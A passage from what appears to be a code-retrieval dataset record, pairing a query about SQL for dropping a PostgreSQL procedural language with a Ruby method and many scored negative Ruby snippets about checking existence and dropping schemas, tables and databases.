"def exists?(object); end",
"def exists?\n !new? && self.class.exists?(id)\n end",
"def remove_should_check_existing?\n true\n end",
"def exist?\n NotImplemented\n end",
"def exist?\n NotImplemented\n end",
"def aws_obj_exists?(opts)\n opts[:obj].exists?\n end",
"def exists?\n retrieve\n true\n rescue Error::NoSuchKey\n false\n end",
"def apply_orphan_strategy\n true\n end",
"def apply_orphan_strategy\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def exist?(name, options = nil)\n res = super(name, options)\n res || false\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n @property_hash and [:running, :pending].include?(@property_hash[:ensure])\n end",
"def create?\n false\n end",
"def exists?\n @exists == true\n end",
"def exist?\n @resource.exist?\n end",
"def load_with_primary_key_lookup?(opts, dynamic_opts)\n opts[:type] == :many_to_one &&\n !dynamic_opts[:callback] && \n opts.send(:cached_fetch, :many_to_one_pk_lookup){opts.primary_key == opts.associated_class.primary_key}\n end",
"def exists?\n begin \n CouchDB.get uri\n true\n rescue\n false\n end \n end",
"def remove_should_check_existing?\n false\n end",
"def add_stored(entry, src_path, &continue_on_exists_proc); end",
"def ensure_exists\n database.ensure_exists(self)\n end",
"def find_or_create_by\n end",
"def supports_concurrent_refreshes?\n postgresql_version >= 90400\n end",
"def exists?\n load!\n true\n rescue RecordNotFound\n false\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def exists(*args); end",
"def exist?\n @lock.synchronize { valid? }\n end",
"def exists?\n is_binded\n end",
"def save\n if exists?\n update_attributes\n else\n if !create.nil?\n true\n else\n false\n end\n end\n end",
"def auto_vivify?\n !fast?\n end",
"def exists?(id, options = {})\r\n id && !find_single(id, options).nil?\r\n rescue ActiveResource::ResourceNotFound\r\n false\r\n end",
"def create_or_update_index\n # check if index is created\n if index_exists?\n IndexJob.perform_later(self.class.name, 'update', id)\n else\n IndexJob.perform_later(self.class.name, 'index', id)\n end\n end",
"def exists?\n !new? && self.class.exists?(to_param, :params => prefix_options)\n end",
"def file_exists\n end",
"def exists? force: false\n return resource_exists? if force\n # If we have a value, return it\n return @exists unless @exists.nil?\n # Always true if we have a gapi_json object\n return true if resource?\n resource_exists?\n end",
"def exists?\n request :head\n true\n rescue Stretcher::RequestError::NotFound\n false\n end",
"def _create\n true\n end",
"def exist?\n !find_exists.nil?\n end",
"def resource_exists?\n ciudades\n end",
"def exists?\n persistent? && (filename && filename.exist?)\n end",
"def exists?\n @property_hash[:ensure] == :present\n end"
] |
[
"0.6839439",
"0.6661225",
"0.6396953",
"0.6232628",
"0.6209676",
"0.60973483",
"0.5978841",
"0.5978841",
"0.5968392",
"0.5937667",
"0.5933376",
"0.59019464",
"0.57371604",
"0.57335764",
"0.5651571",
"0.5592412",
"0.55716753",
"0.5569275",
"0.5567538",
"0.5565487",
"0.5559403",
"0.55492723",
"0.55298316",
"0.54879",
"0.5486587",
"0.5486587",
"0.5484674",
"0.54729617",
"0.5466861",
"0.5433002",
"0.54216295",
"0.54213715",
"0.5418389",
"0.5412478",
"0.5408144",
"0.54059136",
"0.540217",
"0.5374395",
"0.53669834",
"0.53633994",
"0.5356759",
"0.5346346",
"0.5346063",
"0.53274775",
"0.5314363",
"0.5305016",
"0.5286538",
"0.52730405",
"0.5268609",
"0.52677834",
"0.52677834",
"0.5262751",
"0.5262751",
"0.5244908",
"0.52440584",
"0.52423906",
"0.52423906",
"0.52087647",
"0.5208004",
"0.5199909",
"0.5199909",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51894134",
"0.51867634",
"0.51867634",
"0.51867634",
"0.5182699",
"0.5175367",
"0.516273",
"0.51626486",
"0.51559937",
"0.51429147",
"0.5139134",
"0.513157",
"0.51195383",
"0.511369",
"0.51112264",
"0.5104724",
"0.5092759",
"0.5092531",
"0.5089611",
"0.5088339",
"0.50852627",
"0.50842667",
"0.50809294",
"0.50802124",
"0.50797296",
"0.5073121",
"0.5071332",
"0.50610775",
"0.5060701",
"0.5057338",
"0.5050608",
"0.50499046",
"0.5048138"
] |
0.0
|
-1
|
SQL for dropping a procedural language from the database.
|
def drop_language_sql(name, opts=OPTS)
"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_translated_table\n self.connection.drop_table translation_table_name\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def down\n \tdrop_table :problems\n\n \t#execute <<-SQL\n \t#\tDROP TYPE difficulty;\n \t#SQL\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def delete_code(cheatsheet_db, language, delete_by, delete_this)\n cheatsheet_db.execute(\"DELETE FROM #{language} WHERE #{delete_by}=#{delete_this}\")\nend",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def delete(sql, name = nil) end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def delete_sql(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def delete_characters\n @db.execute(\"DROP TABLE Characters\")\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def destroy\n @language_type.destroy\n\n head :no_content\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def delete(database)\n <<-EOS.chomp\n#{read(database)}\n#{database[:id]}.destroy\n EOS\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def delete_from_sql(sql)\n sql << ' FROM '\n source_list_append(sql, @opts[:from][0..0])\n end",
"def destroy\n @language_dialect.destroy\n respond_to do |format|\n format.html { redirect_to language_dialects_url, notice: 'Language dialect was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def db_destroy_postgresql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{dropdb})\n\n\t\t\tinfo = db_parse_db_uri_postgresql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-U')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\tprint()\n\t\t\t\tprint_status(\"Warning: You will need to enter the password at the prompts below\")\n\t\t\t\tprint()\n\t\t\t\targv.push('-W')\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-p')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"dropdb #{cargs} #{info[:name]}\")\n\t\tend",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def destroy\n @programming_language.destroy\n respond_to do |format|\n format.html { redirect_to programming_languages_url, notice: 'Programming language was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def db_remove prod\n $db.query \"DELETE FROM produtos WHERE prod=?\", prod\nend",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete()\n db = PG.connect({ dbname: 'Music_Collection', host: 'localhost'})\n sql = \n \"\n DELETE FROM Music_Collection where id = #{@id};\n \"\n db.exec(sql)\n db.close()\nend",
"def remove_stock(db,stock_ticker)\r\n db.execute(<<-SQL\r\n DELETE FROM stocks2 \r\n Where stock_ticker=\"#{stock_ticker}\";\r\n SQL\r\n )\r\n puts \"===================================================\"\r\n puts \"#{stock_ticker} has been removed from the database.\"\r\n puts \"===================================================\"\r\nend",
"def remove_language\n expression_language = ExpressionLanguage.find(params[:expression_language_id]) unless params[:expression_language_id].blank?\n @expression = expression_language.expression\n \n if !expression_language.blank?\n if expression_language.destroy\n # update related work for solr indexing\n work = @expression.work\n work.save\n end\n end\n \n render :partial => 'languages_form', :locals => { :expression => @expression }\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def down\n \t# Example\n \t# Easy to undo something you create, but this doesn't work\n \t# because it is hard to fix mistakes.\n \t# drop_table :pictures\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def uninstall!(database)\n drop_extension(database)\n make_uninstall(database)\n end",
"def delete_db_post\n # Tell the user\n puts \"> Tar bort aliaset från databasen\".green\n\n # Connect to the database\n conn = PG.connect( dbname: DB_DATABASE_NAME, user: DB_USER, password: DB_PASSWORD )\n\n # Delete the account\n res = conn.exec \"DELETE FROM #{DB_ALIAS_TABLE} WHERE address = '#{$alias}' AND userid = '#{$email}'\" unless $simulate\n\n # Close the connection\n conn.close\nend",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def destroy\n @language_user.destroy\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def clearSQL(fc)\n File.open(\"data/insert-#{fc}.sql\", 'w') do |file|\n file.puts(\"\")\n end\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def delete() # EXTENSION\n sql = \"DELETE FROM films WHERE id = $1\"\n values = [@id]\n SqlRunner.run(sql, values)\nend",
"def delete_db_post domain\n # Tell the user\n puts \"> Tar bort domänen från databasen\".green\n\n # Connect to the database\n conn = PG.connect( dbname: DB_DATABASE_NAME, user: DB_USER, password: DB_PASSWORD )\n\n # Delete the domain\n conn.exec \"DELETE FROM #{DB_DOMAINS_TABLE} WHERE domain = '#{domain['domain']}'\" unless $simulate\n\n # Should we also delete the accounts for the domain?\n if $delete_accounts\n # Tell the user\n puts \"> Tar bort tillhörande e-postkonton från databasen\".green\n # Delete the accounts\n conn.exec \"DELETE FROM #{DB_ACCOUNTS_TABLE} WHERE userid LIKE '%@#{domain['domain']}'\" unless $simulate\n end\n\n # Close the connection\n conn.close\nend",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def delete_symptom(db, id)\n $db.execute( <<-SQL\n DELETE FROM symptoms\n WHERE id=\"#{id}\";\n SQL\n )\nend",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def destroy\n if @language[:default] ='true'\n Language.where(\"id != #{@language[:id]}\").first().update_attributes(:default => true)\n end\n if @language.destroy\n flash[:notice] = I18n.t('admin.languages.destroy.success', :name => @language.name)\n else\n flash[:notice] = I18n.t('admin.languages.destroy.failure', :name => @language.name)\n end\n\n redirect_to :action => :index\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def destroy\n @admin_language = Language.find(params[:id])\n @admin_language.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @my_sql.destroy\n respond_to do |format|\n format.html { redirect_to my_sqls_url, notice: 'My sql was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @accountadmin_language = AccountadminLanguage.find(params[:id])\n @accountadmin_language.destroy\n\n unless @accountadmin_language.errors.empty?\n flash[:notice] = \"WARNING: Couldn't delete language because:\"\n @accountadmin_language.errors.full_messages.each { |m| flash[:notice] << \"<br/>\" << m }\n end\n\n respond_to do |format|\n format.html { redirect_to(accountadmin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def delete_translations\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def db_deleter(database, id)\n database.execute(\"DELETE FROM wine_cellar where id=#{id}\")\nend",
"def drop_sequence(repository, property)\n without_notices { execute(drop_sequence_statement(repository, property)) }\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def cleanup_db_yml(*args)\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end"
] |
[
"0.74222535",
"0.68442863",
"0.6644301",
"0.6460011",
"0.6444636",
"0.6371063",
"0.6324901",
"0.6263596",
"0.6263596",
"0.6256065",
"0.6241722",
"0.62375337",
"0.620885",
"0.6179907",
"0.61783373",
"0.6157233",
"0.6125394",
"0.60962826",
"0.60942584",
"0.607084",
"0.60548294",
"0.6037075",
"0.600055",
"0.5996706",
"0.59909135",
"0.5984927",
"0.5973377",
"0.5966148",
"0.5964057",
"0.5963785",
"0.5934631",
"0.59221005",
"0.58743095",
"0.5870775",
"0.5867548",
"0.5863949",
"0.5859687",
"0.5836754",
"0.5827448",
"0.58038783",
"0.5798652",
"0.57819015",
"0.5753994",
"0.57518834",
"0.5749225",
"0.5749225",
"0.5738356",
"0.5736759",
"0.5718073",
"0.5708343",
"0.5684972",
"0.5677155",
"0.55822307",
"0.5579967",
"0.55756146",
"0.5575608",
"0.5574096",
"0.5571629",
"0.5553795",
"0.5544688",
"0.5543769",
"0.55046254",
"0.5495997",
"0.54923177",
"0.5476139",
"0.54747033",
"0.54653376",
"0.5459103",
"0.5446619",
"0.54343605",
"0.5430078",
"0.5425848",
"0.54213744",
"0.5413116",
"0.5412068",
"0.5406446",
"0.5400202",
"0.53889084",
"0.537983",
"0.5378402",
"0.5376148",
"0.53715605",
"0.5363693",
"0.53552765",
"0.53466356",
"0.53449094",
"0.53423166",
"0.5336788",
"0.53208226",
"0.5309627",
"0.5304734",
"0.5292975",
"0.5292975",
"0.52885246",
"0.52803475",
"0.5260837",
"0.52524304",
"0.524564",
"0.52364933",
"0.5229356"
] |
0.81428945
|
0
|
SQL for dropping a schema from the database.
|
def drop_schema_sql(name, opts=OPTS)
"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def unload_schema(schema_name)\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_tables!\n migrate(:down)\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def destroy_schema\n Apartment::Tenant.drop(schema_name)\n Rails.logger.info(\"Tenant dropped: #{schema_name}\")\n rescue Apartment::TenantNotFound => e\n Rails.logger.warn(\"Failed to drop tenant (not found): #{schema_name}\")\n raise e if Rails.env.production? # Don't raise an exception in dev mode so to allow seeds to work\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def drop_audit_schema!\n @config[:drop_audit_schema] = true\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
